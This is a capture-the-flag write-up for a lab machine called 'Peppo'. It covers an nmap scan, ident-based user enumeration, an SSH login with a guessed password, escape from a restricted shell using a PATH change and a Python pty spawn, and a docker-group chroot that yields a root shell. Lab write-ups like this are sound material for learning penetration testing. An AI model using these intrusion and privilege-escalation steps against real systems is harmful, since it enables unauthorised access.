🐧Peppo

Nmap

sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?

As ident is running we can use the Perl script ident-user-enum to identify which services are running under what user.

Port 10000 reports it is running under the user 'Eleanor'. I tried Bruteforcing the username on SSH and had no luck. Eventually simply trying eleanor:elenaor I was able to log in on SSH.

We see from trying the id the command we are locked in with a restricted bash shell. We can check out our command availability by viewing what binaries we have access to.

Checking GTFObins for any of these binaries can spawn a shell to escape a restricted one:

After running the above command we can export a new path and then spawn a Python shell then again export the path to having full function over the shell session.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

The command id shows we are a member of the docker group. GTFObins again shows a method for spawning a root shell when we are a member of the docker group.

First, check what images we have available to us:

docker image ls

We can use the GTFObins command to replace the value <alpine> with one of the images listed above.

docker run -v /:/mnt --rm -it redmine chroot /mnt sh

Returning a shell as root:

If you found this page helpful to you, please rate it below as per the feedback options. For any corrections or general communications, please see the root page Pentest Everything for contact information.